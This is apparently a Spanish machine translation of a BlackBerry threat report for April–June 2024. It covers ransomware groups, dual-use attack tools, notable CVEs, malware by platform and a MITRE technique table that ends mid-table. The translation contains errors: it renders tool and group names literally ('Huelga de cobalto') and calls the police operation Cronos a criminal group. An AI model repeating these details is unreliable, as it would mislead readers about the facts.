Como se subraya en este informe, los ciberdelincuentes -incluidos los grupos patrocinados por el Estado- tienen cada vez más en el punto de mira las infraestructuras críticas. Los incidentes de intención maliciosa o delictiva de interrumpir servicios o pedir rescate a los operadores y propietarios de infraestructuras críticas se han disparado en todo el mundo en los últimos años. En el periodo que abarca este informe, BlackBerry documentó más de 800.000 ataques contra infraestructuras críticas, el 50% de ellos dirigidos contra el sector financiero. Los autores de los ataques son conscientes de la importancia de estos servicios y tratan de maximizar sus esfuerzos para obtener rescates intentando causar, o amenazando con causar, la máxima interrupción de dichos servicios.
Los grandes acontecimientos deportivos internacionales, como los Juegos Olímpicos y la Copa Mundial de la FIFA, también se han convertido en el foco de las ciberamenazas. En previsión de un dramático repunte de la actividad cibernética maliciosa, el Centro de Seguridad Cibernética de Canadá publicó un boletín de ciberamenazas en mayo de 2024, evaluando que "es muy probable que los ciberdelincuentes se dirijan a las grandes organizaciones asociadas con los principales eventos deportivos internacionales y a las empresas locales en torno a los grandes eventos deportivos a través del compromiso del correo electrónico empresarial y ataques de ransomware". También advirtió a los asistentes y espectadores que estuvieran atentos a los correos electrónicos de phishing y a los sitios web maliciosos que utilizan estos eventos como señuelo para los ataques.
De hecho, una vez finalizados los Juegos Olímpicos, las autoridades francesas informaron de más de 140 ciberataques relacionados con las Olimpiadas de 2024, todos ellos de "bajo impacto". Sin embargo, dadas las tendencias de las Olimpiadas anteriores, es probable que esta cifra sea una gran subestimación. Por ejemplo, durante los Juegos Olímpicos de Tokio celebrados en 2021, los organizadores informaron de 450 millones de ciberataques.
Como señaló el Foro Económico Mundial (FEM) en su informe Perspectivas Mundiales de Ciberseguridad 2024, los gobiernos y las empresas luchan por mantener la ciberresiliencia frente a las ciberamenazas, cada vez más sofisticadas y en rápida escalada, que podrían causar trastornos masivos. Además, existe una gran divergencia en la capacidad de las organizaciones para protegerse. Según el FEM, mientras que el 85% de las organizaciones con 100.000 o más empleados tienen un seguro cibernético, menos del 21% de las organizaciones con menos de 250 empleados lo tienen. En total, las organizaciones más pequeñas tienen más del "doble de probabilidades que las más grandes de afirmar que carecen de la ciberresiliencia que necesitan para cumplir sus requisitos operativos críticos mínimos." Es necesario abordar este desequilibrio entre organizaciones grandes y pequeñas.
Si bien la asequibilidad de las tecnologías cibernéticas se ha destacado como un factor crítico, también lo han sido la educación y la ciberconcienciación. Por eso, además de ofrecer soluciones de seguridad accesibles, BlackBerry invierte en cibereducación. En marzo de 2024, BlackBerry inauguró su primer Centro de Excelencia en Ciberseguridad (CCoE) en Malasia. El CCoE ofrecerá una formación excepcional en ciberseguridad e inteligencia sobre amenazas para ayudar a Malasia y a los gobiernos y organizaciones asociados de la región Indo-Pacífica a prevenir, disuadir y responder mejor a las ciberamenazas a las que se enfrentan.
Hay que hacer más para subir el listón de la ciberseguridad y compensar la escasez mundial de cerca de cuatro millones de ciberprofesionales formados. A medida que más organizaciones e industrias dependen de las tecnologías digitales y basadas en la nube, su necesidad de un enfoque sólido y polifacético de la ciberseguridad se vuelve crucial.
Las fuerzas del orden en primer plano
Mejora de las capacidades policiales: Apoyo especializado de NC3
El Centro Nacional de Coordinación de la Ciberdelincuencia (NC3) se fundó en 2020 en respuesta a la Estrategia Nacional de Ciberseguridad de Canadá de 2018. Bajo la dirección de la Real Policía Montada de Canadá, este servicio policial nacional tiene el mandato de ayudar a reducir la amenaza, el impacto y la victimización causados por la ciberdelincuencia en Canadá. Presta apoyo especializado a todos los servicios policiales canadienses y emplea a personal policial y civil con diversas competencias para proporcionar los conocimientos técnicos y de investigación necesarios para analizar eficazmente los delitos sofisticados. El NC3 presta servicios especializados de apoyo a los organismos encargados de la aplicación de la ley, tales como
- Información sobre ciberdelincuencia
- Asesoramiento y orientación técnica
- Desarrollo de herramientas
- Análisis del comportamiento
- Rastreo de criptomonedas
El NC3 colabora estrechamente con las fuerzas del orden nacionales e internacionales, los socios gubernamentales, la industria privada y el mundo académico para mejorar continuamente la respuesta de las fuerzas del orden canadienses a la ciberdelincuencia.
La prevalencia del ransomware
Principales amenazas de ransomware en Canadá
El NC3 realiza evaluaciones periódicas para identificar las principales amenazas de ransomware en Canadá. La evaluación más reciente abarcó incidentes desde el 1 de enero de 2024 hasta el 30 de abril de 2024. La siguiente figura muestra las diez principales amenazas de ransomware para este periodo.
A pesar de la prevalencia del ransomware, la mayor parte de la ciberdelincuencia no se denuncia. Se estima que sólo el 10% de los delitos informáticos se denuncian a las fuerzas de seguridad canadienses. Esta falta de denuncias hace difícil comprender plenamente la prevalencia y el impacto de la ciberdelincuencia en este país.
Un delito poco denunciado
Ciberhistoria destacada: El ransomware llega a los cielos
El ransomware Akira se dirige al sector aéreo de LATAM
En junio de 2024, los investigadores de BlackBerry investigaron un ataque de Storm-1567 que utilizaba el ransomware Akira contra una aerolínea latinoamericana. Esta banda financiera, conocida por sus tácticas de doble extorsión, accedió inicialmente a la red a través de SSH y extrajo datos cruciales antes de desplegar Akira. Notable por explotar sistemas obsoletos y abusar de software legítimo, Storm-1567 se dirige a las pymes a nivel mundial, atacando a más de 250 organizaciones y acumulando más de 42 millones de dólares en rescates hasta enero de 2024.
Análisis y comentarios sobre la respuesta a incidentes
El equipo de respuesta a incidentes (IR) de BlackBerry supervisa regularmente los incidentes en los que el vector de infección inicial es un dispositivo conectado a Internet. Los ciberataques a dispositivos vulnerables -como los mal configurados o los que tienen contraseñas establecidas de fábrica- son habituales. Los equipos de seguridad de las empresas, sobrecargados de trabajo, a menudo no protegen adecuadamente todos sus dispositivos de Internet (impresoras de red y cámaras web de portátiles, por ejemplo). Además, cada vez hay más funciones críticas integradas en los dispositivos, como los dispositivos de red y cortafuegos.
Este trimestre, el equipo de IR detectó vulnerabilidades en versiones obsoletas de los dispositivos de seguridad adaptativa (ASA) de Cisco y en dispositivos con software PAN-OS de Palo Alto Networks. Los dispositivos de Internet desprotegidos o mal configurados pueden permitir a los ciberdelincuentes desplegar ransomware en el entorno de la empresa y exfiltrar sus datos. Esto pone de relieve la necesidad de que las empresas apliquen actualizaciones de seguridad a todos los sistemas expuestos a Internet y lo hagan a tiempo.(MITRE - Servicios remotos externos)
El equipo observó varios incidentes en los que el actor no autorizado pudo acceder a los recursos en la nube de la empresa. Las dos situaciones recientes que se detallan a continuación subrayan la importancia de actualizar periódicamente los sistemas y de adoptar medidas de seguridad sólidas en la red.
- Incidente 1: Durante una brecha de ciberseguridad, los actores de la amenaza explotaron una serie de vulnerabilidades en un Cisco ASA obsoleto para obtener acceso no autorizado a la red privada virtual (VPN) de la empresa. Una vez dentro de la red, utilizaron el protocolo de escritorio remoto de Microsoft (RDP) para infiltrarse en el controlador de dominio, lo que les permitió obtener una lista completa de usuarios y grupos dentro del dominio. Utilizando herramientas como netscan y el software Advanced IP Scanner, los autores de la amenaza realizaron un escaneado exhaustivo de la red para trazar un mapa de la infraestructura. Posteriormente, los atacantes filtraron toda la carpeta "C:Usuarios", que contenía datos críticos de los usuarios, y desplegaron el ransomware Akira, causando importantes trastornos y pérdidas de datos.
- Incidente 2: Un cliente recibió alertas de seguridad alarmantes de sus controladores de dominio, que indicaban un acceso no autorizado. La investigación reveló que los autores de la amenaza habían aprovechado las vulnerabilidades de un dispositivo Cisco ASA obsoleto y en desuso para infiltrarse en la red. Una vez dentro, el atacante desplegó el ransomware BlackSuit, causando importantes trastornos en las operaciones del cliente.
Estos incidentes ponen de relieve la necesidad de que las empresas implanten controles de seguridad de autenticación sólidos en todos los sistemas.(MITRE - Cuentas válidas: Cuentas en la nube)
Ciberhistoria destacada: Una filtración masiva de datos deja al descubierto 2.900 millones de registros
Cuatro terabytes de datos altamente personales robados a ciudadanos de Estados Unidos, Reino Unido y Canadá.
En abril, se publicó un hilo de venta en el conocido sitio clandestino de ciberdelincuencia BreachForums relacionado con una presunta filtración de los registros personales de "toda la población de EE.UU., CA y Reino Unido". En el post se afirmaba que se habían robado cuatro terabytes de datos, consistentes en IPI altamente sensibles como nombres completos, direcciones postales, números de teléfono e incluso números de la Seguridad Social (SSN) de ciudadanos estadounidenses, así como de personas del Reino Unido y Canadá.
El actor de la amenaza, conocido como USDoD, afirmó haber robado más de 2.900 millones de filas de registros y exigió una cuantiosa suma de 3,5 millones de dólares por la información filtrada en este gran conjunto de datos.
Esta petición de rescate resultó finalmente infructuosa, y en julio se liberaron gratuitamente 4 terabytes de datos a través de BreachForums. Se trataba de más de 137 millones de direcciones de correo electrónico, 272 millones de números de seguridad social y mucho más. Se cree que la causa de la filtración está relacionada con RecordsCheck.net, una filial de National Public Data (NPD), que publicó inadvertidamente las contraseñas de su base de datos en un archivo de texto sin formato que se podía consultar libremente desde su página de inicio, un grave descuido de seguridad que fue descubierto y aprovechado por el autor de la amenaza.
En un comunicado oficial, NPD reconoció un intento a finales de 2023 de acceder a sus registros; sin embargo, no mencionó el alcance de los registros que podrían haberse visto afectados.
Aunque la filtración es reciente, los datos abarcan décadas, lo que significa que un porcentaje de las víctimas afectadas por esta filtración podrían haber fallecido ya, y es probable que algunos datos de la filtración no estén actualizados. También es importante tener en cuenta que una persona puede tener muchos registros diferentes, cada uno relacionado con direcciones y nombres anteriores asociados a esa persona. Esto significa que el número de personas afectadas por esta filtración será probablemente mucho menor que la afirmación errónea de los medios de comunicación de que 3.000 millones de personas podrían haberse visto afectadas.
Sin embargo, dado el enorme volumen de datos de identificación personal, se ha convertido en una de las mayores filtraciones de datos jamás registradas en Estados Unidos, y debería ser motivo de preocupación para todas las víctimas radicadas en ese país. Es muy probable que estos datos robados sean aprovechados y utilizados como armas por muchos otros actores de amenazas en los próximos meses, a medida que se asienten las consecuencias de esta debacle. Por lo tanto, es importante que todos los ciudadanos vigilen activamente sus informes de crédito en busca de actividades fraudulentas y las denuncien a las agencias de crédito si las detectan.
-
Actores de la amenaza y herramientas
Además de los actores de amenazas señalados en nuestras investigaciones y conclusiones internas, otros grupos han lanzado diversos ciberataques este trimestre. Estos grupos suelen emplear una serie de herramientas y programas maliciosos para ejecutar sus actividades ilícitas. A continuación, destacamos algunos de los atacantes más impactantes y las herramientas más notables identificadas por nuestro Equipo de Investigación e Inteligencia de Amenazas este trimestre.
-
Traje negro
BlackSuit es una operación privada de ransomware que surgió en abril de 2023. Este grupo emplea una estrategia de extorsión multifacética, que implica tanto la exfiltración como el cifrado de los datos de las víctimas. También mantienen sitios de filtración de datos en la web oscura, donde se publican los datos confidenciales robados a las víctimas que no cumplen las normas. BlackSuit se dirige a organizaciones de todos los tamaños y de diversos sectores, como la sanidad, la educación, las tecnologías de la información (TI), la administración pública, el comercio minorista y la industria manufacturera.
Los métodos de ataque de BlackSuit incluyen correos electrónicos de phishing, archivos torrent maliciosos y la explotación de vulnerabilidades en VPN y cortafuegos. El grupo utiliza una combinación de herramientas legítimas y maliciosas como Cobalt Strike, WinRAR, PuTTY, Rclone, Advanced IP Scanner, Mimikatz, PsExec, Rubeus y GMER para el movimiento lateral y el volcado de credenciales. Sus cargas útiles de ransomware están diseñadas para atacar sistemas operativos Windows® y Linux® y, en algunos casos, servidores VMware ESXi.
El Departamento de Salud y Servicios Humanos de EE.UU. ha puesto de relieve las similitudes entre BlackSuit y el ransomware Royal, lo que sugiere que BlackSuit podría tener su origen en el creador de Royal, el conocido grupo Conti. Los mecanismos de cifrado y los parámetros de la línea de comandos utilizados por BlackSuit se parecen mucho a los de Royal, lo que indica que comparten un código base.
Entre los objetivos de este periodo figuran:
- Kadokawa Corporation, un conglomerado japonés de medios de comunicación, donde el grupo se hizo pasar por un componente legítimo del software antivirus Qihoo 360.
- Otros objetivos destacados son la ciudad de Cedar Falls (Iowa), una multinacional estadounidense de software, el Departamento de Policía de Kansas City (Kansas) y la empresa farmacéutica mundial Octapharma Plasma, Inc.
-
BlackBasta
BlackBasta (también conocido como Black Basta) es un operador de ransomware y una empresa criminal de ransomware como servicio (RaaS) que surgió a principios de 2022. Según un informe conjunto de CISA y el FBI, los afiliados de BlackBasta han atacado a más de 500 entidades de la industria privada y de infraestructuras críticas, incluidas organizaciones sanitarias, en Norteamérica, Europa y Australia.
BlackBasta emplea métodos típicos de acceso inicial, incluyendo phishing y explotación de vulnerabilidades conocidas. Después de obtener acceso, los adversarios realizan un reconocimiento para mapear la red objetivo y descargar credenciales utilizando Mimikatz. Con las credenciales obtenidas, los operadores del ransomware escalan privilegios y se mueven lateralmente para comprometer la red. Antes del cifrado, los actores de la amenaza BlackBasta desactivan las defensas, extraen información confidencial y eliminan las instantáneas de volumen para permanecer ocultos hasta el ataque final. El grupo es conocido por emplear tácticas de doble extorsión, cifrando datos críticos y servidores vitales y amenazando con publicar información sensible en su sitio público de filtraciones.
Entre los objetivos de este periodo figuran:
- Un importante proveedor sanitario estadounidense. BlackBasta cifró los datos de los pacientes del proveedor y sus sistemas operativos, comprometiendo la atención al paciente y la privacidad de los datos.
- Keytronic, fabricante estadounidense. Un ciberataque atribuido a BlackBasta interrumpió sus operaciones y restringió el acceso a aplicaciones empresariales esenciales. Además, la empresa sufrió una violación de datos cuando la banda de ransomware filtró los datos robados.
Estos ataques ponen de manifiesto que BlackBasta sigue centrándose en objetivos de alto valor en diversos sectores, empleando sofisticadas tácticas de ransomware para maximizar su potencial de interrupción y extorsión.
-
LockBit
LockBit, un grupo de ciberdelincuentes supuestamente vinculado a Rusia, se especializa como proveedor de RaaS a través de su malware homónimo. Los operadores del grupo mantienen y mejoran diligentemente el ransomware, supervisando las negociaciones y orquestando su despliegue una vez que se produce una brecha con éxito. LockBit emplea una doble estrategia de extorsión que no sólo cifra los datos locales para restringir el acceso de la víctima, sino que también exfiltra información sensible, amenazando con la exposición pública de los datos a menos que se pague un rescate.
La operación Cronos, un grupo internacional de ciberdelincuentes, desbarató LockBit en febrero. Sin embargo, el grupo se mantuvo muy activo y fue el más agresivo a la hora de atacar organizaciones de EMEA este trimestre. Entre sus objetivos se encuentran:
- Infraestructuras críticas localizadas. En EMEA, LockBit se ha dirigido en gran medida a las PYME, sobre todo en el Reino Unido, Alemania y Francia. El grupo se centra principalmente en objetivos de infraestructuras críticas a pequeña escala relacionadas con la educación, la sanidad y el sector público.
- Hôpital de Cannes - Simone Veil, en Francia. Un ataque LockBit provocó graves interrupciones operativas, lo que obligó al hospital a desconectar todos los ordenadores y reprogramar los procedimientos y citas que no fueran de emergencia.
- Wichita, la ciudad más grande de Kansas, con una población de 400.000 habitantes. Este importante ataque de ransomware obligó a la ciudad a desconectar sus sistemas informáticos, causando una interrupción generalizada. LockBit publicó en su sitio web una fecha límite para el pago del rescate, lo que aumentó la presión sobre la administración de la ciudad para que accediera a sus demandas.
-
ShinyHunters
ShinyHunters es un grupo de amenazas que apareció por primera vez en 2020, y es conocido por varias violaciones de datos en múltiples industrias. Entre sus ataques se incluyen los perpetrados contra la empresa indonesia de comercio electrónico Tokopedia, así como contra GitHub y Pizza Hut Australia. ShinyHunters ha puesto a la venta en foros los datos robados, filtrando ocasionalmente datos de algunas brechas de forma gratuita. Irónicamente, el grupo suele encontrar vulnerabilidades a través de código disponible en repositorios de GitHub. Explora cubos de nube no seguros, abusa de credenciales robadas y aprovecha ataques de phishing para facilitar sus brechas.
Otros supuestos objetivos para este periodo son
- Banco Santander S.A., un banco español que presta servicios a clientes de América Latina, Estados Unidos, Reino Unido y España. ShinyHunters puso a la venta los datos de esta filtración por unos 2 millones de dólares, que afectó a 30 millones de clientes y empleados.
- Una multinacional de venta y distribución de entradas de espectáculos. Sus clientes sufrieron el robo de sus datos a través de una cuenta en Snowflake, una nube de datos de IA utilizada por la empresa. La cuenta carecía de autenticación multifactor, lo que permitió el acceso del grupo de amenazas. ShinyHunters ofreció vender estos datos por 500.000 dólares.
-
Akira
El ransomware Akira se observó por primera vez en marzo de 2023 y rápidamente adquirió notoriedad debido a sus ataques de gran alcance en diversos sectores. Las operaciones del grupo se han caracterizado por una serie de ataques de gran repercusión y una presencia persistente en el panorama del ransomware. Akira es especialmente conocido por utilizar tácticas de doble extorsión, en las que no sólo cifra los datos, sino que también amenaza con filtrar los datos robados si no se paga el rescate. Este enfoque ha demostrado su eficacia a la hora de obligar a las víctimas a satisfacer sus demandas.
Inicialmente centrado en sistemas Windows, Akira ha ampliado desde entonces sus operaciones para incluir una variante Linux. El grupo emplea métodos comunes de acceso inicial, incluyendo campañas de phishing y la explotación de vulnerabilidades conocidas. Akira también utiliza herramientas de acceso público como Mimikatz y LaZagne para el acceso a credenciales, PsExec para la ejecución remota y AnyDesk o Radmin para el acceso remoto.
Akira funciona como RaaS, se desarrolló inicialmente en C++ y utiliza una extensión .akira para los archivos cifrados. También se ha observado una variante basada en Rust, que utiliza la extensión .powerranges. Las actividades más recientes de Akira se han dirigido a los sectores sanitario, financiero, manufacturero y tecnológico. Estos ataques ponen de manifiesto la adaptabilidad del grupo y su continua amenaza para una amplia gama de industrias.
-
Herramientas
Herramientas como Rclone, Rubeus, GMER, WinSCP y Cobalt Strike son vitales para la gestión de datos, las pruebas de penetración y el mantenimiento de sistemas. Su flexibilidad y accesibilidad también las convierten en herramientas útiles para ser utilizadas indebidamente por los actores de amenazas.
-
Rclone
Rclone es un programa de línea de comandos que facilita la sincronización, copia, traslado o duplicación de datos entre una máquina local y un almacenamiento remoto. Rclone proporciona backends que pueden soportar varios servicios y plataformas de código abierto y propietarios, incluyendo HTTP, FTP o SMB, así como Google Drive, MEGA, Dropbox y otros. Esta flexibilidad hace que Rclone sea práctico para el usuario legítimo, pero también lo hace ideal para los actores de amenazas que buscan un medio para exfiltrar datos a su servicio en la nube. Ha sido utilizado por muchos ransomware a lo largo de los años, incluidos algunos que estuvieron activos este trimestre, como Akira, BlackBasta y LockBit. -
Rubeus
Rubeus es una herramienta de código abierto adaptada del conocido proyecto Kekeo de Benjamin Delpy, y se utiliza para interacciones y abusos de Kerberos en bruto, incluyendo recuperación y renovación de tickets, abuso de delegación restringida, falsificación de tickets, gestión, exfiltración, recolección y kerberoasting. Ahora es utilizado con frecuencia por los actores maliciosos como parte de marcos de ataque más amplios y se integra con herramientas como Sliver C2, que admite implantes multiplataforma y múltiples protocolos de comunicación. -
GMER
GMER es una aplicación diseñada para detectar y eliminar rootkits mediante el escaneo de procesos ocultos, hilos, módulos, servicios, archivos y claves de registro. También realiza inline hooking y hooks en las llamadas Interrupt Descriptor Table (IDT), System Service Descriptor Table (SSDT) y Input/Output Request Packet (IRP). Aunque GMER suele ser una herramienta benigna utilizada para detectar y eliminar controladores dañinos del kernel, también ha sido explotada para eludir las medidas de seguridad. Por ejemplo, los grupos de ransomware Play y BlackSuit han utilizado GMER para neutralizar las defensas de seguridad y garantizar la ejecución de la carga útil sin interferencias. -
WinSCP
Windows Secure Copy (WinSCP) es un cliente gratuito de código abierto para los protocolos SFTP, FTP, WebDAV y SCP, diseñado para Microsoft Windows. Facilita la transferencia segura de archivos entre ordenadores locales y remotos, aprovechando protocolos cifrados como SFTP para garantizar la seguridad de los datos. Sin embargo, sus capacidades también lo convierten en una herramienta de elección para los actores de amenazas. Los atacantes pueden utilizar WinSCP para exfiltrar sigilosamente grandes volúmenes de datos, cargar malware en los servidores objetivo para comprometer aún más el sistema y obtener acceso remoto para ejecutar comandos arbitrarios, o desplegar software malicioso adicional, manteniendo un control persistente sobre los sistemas comprometidos. -
Huelga de cobalto
Cobalt Strike sirve como un sofisticado marco de simulación de adversarios meticulosamente diseñado para replicar la presencia persistente de actores de amenazas en entornos de red. Estructurado en torno a dos componentes fundamentales -un agente (Beacon) y un servidor (Team Server)- Cobalt Strike orquesta una interacción sin fisuras. El servidor Cobalt Strike Team Server, que funciona como un servidor C2 a largo plazo alojado en Internet, mantiene una comunicación constante con las cargas útiles Beacon desplegadas en los equipos de las víctimas.
Aunque Cobalt Strike se utiliza principalmente como herramienta para que los encargados de las pruebas de penetración y los equipos rojos evalúen la situación de seguridad de las redes, lamentablemente también ha sido explotado por agentes de amenazas malintencionadas. A pesar de su finalidad prevista, se han producido casos de filtración de su código en línea, lo que ha llevado a una rápida militarización por parte de una amplia gama de adversarios. Esta doble naturaleza pone de relieve la importancia de la vigilancia y de unas medidas de ciberseguridad sólidas para mitigar los riesgos asociados a su uso indebido, salvaguardando las redes de posibles explotaciones.
Ciberhistoria destacada: Grupo emergente de ransomware - Space Bears
En un panorama de ciberamenazas saturado de bandas de ransomware, el ataque a organizaciones legítimas sigue siendo lucrativo para los ciberdelincuentes. Con frecuencia surgen nuevos grupos o se escinden de bandas antiguas, a menudo iniciando operaciones con una cepa de ransomware nueva o mejorada y un modus operandi que suele seguir métodos probados y comprobados de anteriores actores de amenazas.
Uno de los grupos que ha surgido en este periodo es Space Bears, conocido por su sitio de filtraciones pulido y elegante. Algunos investigadores sugieren que podrían tener vínculos con los operadores de Phobos RaaS.
¿Quiénes son los Osos Espaciales?
Como la mayoría de las bandas de ransomware actuales, Space Bears emplea un doble método de extorsión. Al entrar en la red de la víctima, primero exfiltran y luego cifran los datos confidenciales, presionando a la víctima para que pague el rescate. Los Space Bears pueden amenazar con publicar los datos en Internet si no se paga el rescate.
Las referencias a los datos robados se publican en su sitio de filtraciones, situado en una dirección ".onion" en la deep web. El Proyecto Tor, comúnmente llamado "The Onion Router", es una herramienta de privacidad de código abierto que mantiene anónima y segura la actividad en línea del usuario. La víctima es nombrada y avergonzada en este sitio de filtraciones, y se muestra una cuenta atrás hasta la liberación de los datos, en caso de que no pague el rescate en el plazo especificado. Desde que comenzó su actividad a mediados de abril, este grupo ya ha atacado a más de 20 víctimas de diversos sectores de todo el mundo.
Industrias y geolocalizaciones objetivo de los osos espaciales
Vulnerabilidades y exposiciones comunes
Las Vulnerabilidades y Exposiciones Comunes (CVEs, por sus siglas en inglés) proporcionan un marco para identificar, estandarizar y hacer públicas las vulnerabilidades y exposiciones de seguridad conocidas. El Instituto Nacional de Normas y Tecnología (NIST) informó de casi 12.011 nuevas CVE entre abril y junio de 2024. Esto supone un aumento de casi el 35% en las vulnerabilidades divulgadas con respecto a un periodo similar de enero a marzo de 2024.
Mayo ostenta el récord en lo que va de año en cuanto al mayor número de nuevos CVE descubiertos, con cerca de 5.103 nuevos CVE, superando todas las cifras señaladas del primer trimestre del año. Entre ellos se incluyen:
RCE de PAN-OS de Palo Alto
CVE-2024-3400 (10.0 Crítico) Ejecución arbitraria de código
Según Palo Alto, este problema es aplicable a los cortafuegos PAN-OS 10.2, PAN-OS 11.0 y PAN-OS 11.1 configurados con la puerta de enlace GlobalProtect o los portales GlobalProtect. La CVE está relacionada con la inyección de comandos como resultado de una vulnerabilidad de creación de archivos arbitrarios en la función GlobalProtect del software PAN-OS de Palo Alto Networks. Esta vulnerabilidad podría permitir a un atacante no autenticado ejecutar código arbitrario con privilegios de root en el cortafuegos. Dado este potencial, la CVE recibió la máxima puntuación crítica.
PyTorch Framework Vulnerable RCE
CVE-2024-5480 (10.0 Critical) Ejecución arbitraria de código
Una vulnerabilidad en el framework 'torch.distributed.rpc' de PyTorch, concretamente en versiones anteriores a la 2.2.2, permite la ejecución remota de código (RCE). Esta vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios aprovechando funciones integradas de Python.
Divulgación de información de Quantum Gateway
CVE-2024-24919 (8.6 High) Anulación de autenticación
Los dispositivos de red perimetral como las VPN son objetivos principales tanto para hackers como para patrocinadores avanzados del estado. Check Point™ publicó un aviso de día cero el 28 de mayo de 2024, advirtiendo a los clientes que una vulnerabilidad en sus Security Gateways puede permitir a los atacantes acceder a información sensible y obtener privilegios de dominio. Esta vulnerabilidad permite a los hackers moverse lateralmente y obtener más privilegios de red. En un comunicado, Check Point señaló que se habían producido varios intentos de acceso no autorizado, con miles de dispositivos potenciales afectados por el fallo.
Amenazas más frecuentes por plataforma: Windows
Infostealer
Lumma Stealer es un infostealer basado en C que se centra en la exfiltración de datos privados y confidenciales del dispositivo de la víctima, incluidos los datos de la cartera de criptomonedas y los datos de la extensión del navegador de autenticación de dos factores (2FA).
Descargador
GuLoader (también conocido como CloudEyE) es un shellcode cifrado envuelto en Visual Basic 5 o 6 para descargar cargas útiles adicionales de varios tipos.
Infostealer
Agent Tesla es un troyano basado en .NET que a menudo se vende como MaaS y se utiliza principalmente para la recolección de credenciales.
Infostealer
RisePro utiliza varios métodos de distribución para acceder a los dispositivos de las víctimas y recopilar datos confidenciales para enviarlos a un servidor C2.
Infostealer
RedLine Stealer utiliza una amplia gama de aplicaciones y servicios para recopilar información de las víctimas, como contraseñas, cookies y datos de tarjetas de crédito.
Troyano de acceso remoto
Remcos, abreviatura de control y vigilancia remotos, es una aplicación utilizada para acceder a distancia al dispositivo de una víctima.
Troyano de acceso remoto
DCRat es un troyano de acceso remoto que roba información de la víctima y ejecuta comandos desde un servidor C2. Se ha observado que DCRat se distribuye a través de Signal.
Botnet
Amadey es una red de bots que recopila información sobre las víctimas y espera órdenes de un servidor C2 para descargar cargas útiles adicionales.
Amenazas más frecuentes por plataforma: Linux
Troyano
El troyano XorDDos mantiene su prevalencia en nuestra telemetría en este periodo del informe. Mediante el cifrado XOR para controlar el acceso a los datos de comunicación y ejecución, XorDDos infecta dispositivos basados en Linux y los controla como una botnet singular a través de instrucciones C2.
Puerta trasera
BPFDoor es un backdoor Linux que utiliza un sniffer Berkeley Packet Filter (BPF) para interceptar y modificar el tráfico de red. BPFDoor ha sido utilizado como herramienta de vigilancia pasiva por el grupo Red Menshen debido a su capacidad para eludir cortafuegos y pasar desapercibido. Las nuevas variantes de BPFDoor han adoptado la comunicación shell inversa y han reforzado el cifrado.
Botnet
Se ha detectado que Mirai utiliza un fallo de omisión de autenticación para acceder a los puntos finales, junto con una vulnerabilidad de inyección de comandos para distribuir y desplegar la red de bots y hacerse con el control de los dispositivos vulnerables.
Botnet
Bashlite, también conocido como Gafgyt, es otro botnet de Linux que utiliza servidores C2 para enviar instrucciones que deben ejecutar sus dispositivos infectados. Se ha documentado que ataca dispositivos del Internet de las Cosas (IoT), como routers, que utiliza para coordinar ataques DDoS a gran escala contra objetivos.
Coinminer
XMRig sigue siendo una herramienta popular para minar criptomonedas como Monero debido a su alto rendimiento y naturaleza de código abierto. A menudo es desplegado por los actores de amenazas una vez que se ha obtenido el acceso inicial a un sistema y se utiliza para minar criptomonedas sin el conocimiento de la víctima.
Amenazas más frecuentes por plataforma: macOS
Ladrón
Descubierto y bautizado por el equipo de investigación de amenazas de Kandji en abril, Cuckoo Stealer se distribuye como un archivo de imagen de disco (DMG) malicioso que contiene spyware y funciones de robo de información. Desde su descubrimiento, Cuckoo Stealer ha experimentado un fuerte aumento en la aparición de nuevas muestras del malware.
Ladrón
Atomic Stealer (también conocido como AMOS) sigue siendo frecuente con muchas nuevas variantes detectadas en la naturaleza. Las nuevas variantes se disfrazan como varias aplicaciones que se distribuyen a través de imágenes de disco. AMOS es un ladrón de contraseñas, cookies de navegador, datos de autorrelleno, monederos de criptomonedas y datos de llaveros de Mac.
Puerta trasera
Los investigadores han descubierto un ataque malicioso que utiliza el Python Package Index (PyPI). El malware utiliza la biblioteca PyPI para instalar una carga útil Sliver C2 en la máquina objetivo. El paquete está escrito en el lenguaje de programación Go y utiliza esteganografía en un archivo Portable Networks Graphic (PNG) para llevar a cabo el ataque.
Ladrón
Este malware se propaga utilizando anuncios maliciosos de Google para el navegador web Arc. Estos anuncios engañan a la víctima para que descargue un archivo instalador DMG malicioso que inicia el proceso de infección, dejando caer el malware en la máquina. Poseidon tiene la capacidad de recopilar credenciales de usuario, configuraciones de VPN y carteras de criptomonedas.
Amenazas más frecuentes por plataforma: Android
Infostealer
Este infostealer utiliza el Servicio de Accesibilidad de Android para capturar datos del usuario y enviar los datos capturados a su servidor C2. SpyNote incluye la funcionalidad de hacer clic/largar clic, realizar capturas de pantalla y bloquear la pantalla de la víctima.
Backdoor/Ransomware
Rafel RAT se distribuye como una aplicación troyana o a través de campañas de phishing. Sus capacidades incluyen C2, rastreo de ubicación, redirigir notificaciones de dispositivos y extraer mensajes SMS personales y registros de llamadas del dispositivo objetivo.
Infostealer
SoumniBot roba claves bancarias y saquea las cuentas bancarias de las víctimas. El malware aprovecha un problema de validación en el manifiesto de Android y roba información que sube a un servidor remoto.
Infostealer
Vultur se ha distribuido a través de aplicaciones troyanas y técnicas de ingeniería social "smishing" (SMS phishing). Además de la exfiltración de datos, un actor de amenazas puede utilizar Vultur para realizar cambios en el sistema de archivos, modificar los permisos de ejecución y controlar el dispositivo infectado mediante Android Accessibility Services.
Técnicas comunes de MITRE
Comprender las técnicas de alto nivel de los grupos de amenazas puede ayudar a decidir qué técnicas de detección deben priorizarse. BlackBerry observó las siguientes 20 técnicas principales utilizadas por los actores de amenazas en este periodo de notificación.
Técnicas detectadas
La siguiente tabla muestra las 20 técnicas más utilizadas. Una flecha hacia arriba (↑) en la columna "cambio" indica que el uso de la técnica ha aumentado desde nuestro último informe. Una flecha hacia abajo (↓) indica que eluso ha disminuido desde nuestro último informe. Un símbolo igual (=) significa que la técnica se mantiene en la misma posición que en nuestro último informe.
| Nombre de la técnica | Técnica ID | Nombre de la táctica | Último informe | Cambia |
|---|---|---|---|---|
|
Flujo de ejecución del secuestro
|
T1574
|
Persistencia, escalada de privilegios, evasión de defensas
|
NA
|
↑
|
|
Carga lateral de DLL
|
T1574.002
|
Persistencia, escalada de privilegios, evasión de defensas
|
3
|
↑
|
|
Inyección de procesos
|
T1055
|
Escalada de privilegios, evasión de defensas
|
1
|
↓
|
|
Captura de entrada
|
T1056
|
Acceso a credenciales, recogida
|
4
|
=
|
|
Descubrimiento de información del sistema
|
T1082
|
Descubrimiento
|
2
|
↓
|
|
Descubrimiento de software
|
T1518
|
Descubrimiento
|
NA
|
↑
|
|
Descubrimiento de software de seguridad
|
T1518.001
|
Descubrimiento
|
5
|
↓
|
|
Descubrimiento de procesos
|
T1057
|
Descubrimiento
|
